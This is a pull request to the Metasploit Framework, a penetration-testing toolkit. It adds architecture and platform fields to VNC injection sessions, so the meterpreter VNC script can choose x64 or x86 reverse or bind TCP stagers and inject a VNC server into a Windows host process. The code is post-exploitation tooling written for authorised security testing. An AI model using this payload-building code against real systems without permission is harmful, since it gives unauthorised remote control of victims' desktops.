### PR TITLE
Fix vncinject missing session & arch to fix VNC script

### DIFF
--- a/lib/msf/base/sessions/vncinject.rb
+++ b/lib/msf/base/sessions/vncinject.rb
@@ -16,6 +16,16 @@ class VncInject
   include Msf::Session::Basic
 
   #
+  # The architecture of the injected VNC server (e.g. ARCH_X86, ARCH_X64).
+  #
+  attr_accessor :arch
+
+  #
+  # The platform the injected VNC server is running on.
+  #
+  attr_accessor :platform
+
+  #
   # Initializes a vncinject session instance using the supplied rstream
   # that is to be used as the client's connection to the server.
   #

--- a/lib/msf/base/sessions/vncinject_options.rb
+++ b/lib/msf/base/sessions/vncinject_options.rb
@@ -67,6 +67,27 @@ module VncInjectOptions
   # viewer.
   #
   def on_session(session)
+    # Taken from: https://github.com/rapid7/metasploit-framework/blob/73a0914c4ac1d4c01919fb3b7dc1260c72ad6122/lib/msf/base/sessions/command_shell_options.rb#L35
+    platform = nil
+    if self.platform and self.platform.kind_of? Msf::Module::PlatformList
+      platform = self.platform.platforms.first.realname.downcase
+    end
+    if self.platform and self.platform.kind_of? Msf::Module::Platform
+      platform = self.platform.realname.downcase
+    end
+
+    # a blank platform is *all* platforms and used by the generic modules, in that case only set this instance if it was
+    # not previously set to a more specific value through some means
+    session.platform = platform unless platform.blank? && !session.platform.blank?
+
+    if self.arch
+      if self.arch.kind_of?(Array)
+        session.arch = self.arch.join('')
+      else
+        session.arch = self.arch
+      end
+    end
+
     # Calculate the flags to send to the DLL
     flags = 0
 

--- a/modules/payloads/stages/windows/vncinject.rb
+++ b/modules/payloads/stages/windows/vncinject.rb
@@ -22,7 +22,8 @@ module MetasploitModule
         'Description' => 'Inject a VNC Dll via a reflective loader (staged)',
         'Author' => [ 'sf' ],
         'Session' => Msf::Sessions::VncInject,
-        'Convention' => 'sockedi -http -https'
+        'Convention' => 'sockedi -http -https',
+        'Arch' => ARCH_X86
       )
     )
   end

--- a/modules/payloads/stages/windows/x64/vncinject.rb
+++ b/modules/payloads/stages/windows/x64/vncinject.rb
@@ -19,7 +19,8 @@ module MetasploitModule
         'Name' => 'Windows x64 VNC Server (Reflective Injection)',
         'Description' => 'Inject a VNC Dll via a reflective loader (Windows x64) (staged)',
         'Author' => [ 'sf' ],
-        'Session' => Msf::Sessions::VncInject
+        'Session' => Msf::Sessions::VncInject,
+        'Arch' => ARCH_X64
       )
     )
   end

--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@@ -90,26 +90,26 @@ def unsupported
 end
 unsupported if client.platform != 'windows'
 
+is_x64 = client.arch == 'x64'
+
 #
 # Create the raw payload
 #
 if (tunnel)
   print_status("Creating a VNC bind tcp stager: RHOST=#{lhost} LPORT=#{rport}")
-  payload = "windows/vncinject/bind_tcp"
-
-  pay = client.framework.payloads.create(payload)
-  pay.datastore['RHOST'] = lhost
-  pay.datastore['LPORT'] = rport
-  pay.datastore['VNCPORT'] = vport
+  payload = is_x64 ? "windows/x64/vncinject/bind_tcp" : "windows/vncinject/bind_tcp"
 else
   print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport}")
-  payload = "windows/vncinject/reverse_tcp"
-
-  pay = client.framework.payloads.create(payload)
-  pay.datastore['LHOST'] = rhost
-  pay.datastore['LPORT'] = rport
-  pay.datastore['VNCPORT'] = vport
+  payload = is_x64 ? "windows/x64/vncinject/reverse_tcp" : "windows/vncinject/reverse_tcp"
 end
+
+pay = client.framework.payloads.create(payload)
+
+raise "Failed to create payload: #{payload}" unless pay
+
+tunnel ? pay.datastore['RHOST'] = lhost : pay.datastore['LHOST'] = rhost
+pay.datastore['LPORT'] = rport
+pay.datastore['VNCPORT'] = vport
 
 if (not courtesy)
   pay.datastore['DisableCourtesyShell'] = true
@@ -153,7 +153,7 @@ if (inject)
   host_process.memory.write(mem, raw)
   host_process.thread.create(mem, 0)
 else
-  exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
+  exe = is_x64 ? ::Msf::Util::EXE.to_win64pe(client.framework, raw) : ::Msf::Util::EXE.to_win32pe(client.framework, raw)
   print_status("VNC stager executable #{exe.length} bytes long")
 
   #


### PR DESCRIPTION
## Description

This PR fixes being unable to run VNC sessions from Pro.

## Breaking Changes

None

## Reviewer Notes

None

## Verification Steps

1. - [ ] Get a Windows 2008 R2 x64 box
2. - [ ] Get a session in Pro against the target using persistent listener (or other ways)
3. - [ ] Navigate to the session and click on 'Remote Desktop'
4. - [ ] Connect using e.g. TigerVNC (MacOS's screen sharing app does not work, different from VNC)

## Before
Broken VNC in this scenario:
(In Pro: `tail -f ./engine/config/logs/framework.log`)
```
[07/27/2026 15:26:00] [e(0)] core: Problem reporting session - NoMethodError undefined method `arch' for an instance of Msf::Sessions::VncInject
[07/27/2026 15:26:00] [w(0)] core: Exception in on_session_open event handler: NoMethodError: undefined method `arch' for an instance of Msf::Sessions::VncInject
[07/27/2026 15:26:00] [w(0)] core: Call Stack
x/metasploit-framework/lib/msf/core/session.rb:281:in `session_type'
x/metasploit-framework/lib/msf/core/db_manager/session.rb:308:in `block in create_mdm_session_from_session'
```

## After
Working VNC with TigerVNC (Ubuntu -> Windows 2008 R2)
<img width="1958" height="664" alt="image" src="https://github.com/user-attachments/assets/4fa9af23-516d-4bb8-a7e6-40c35b278658" />
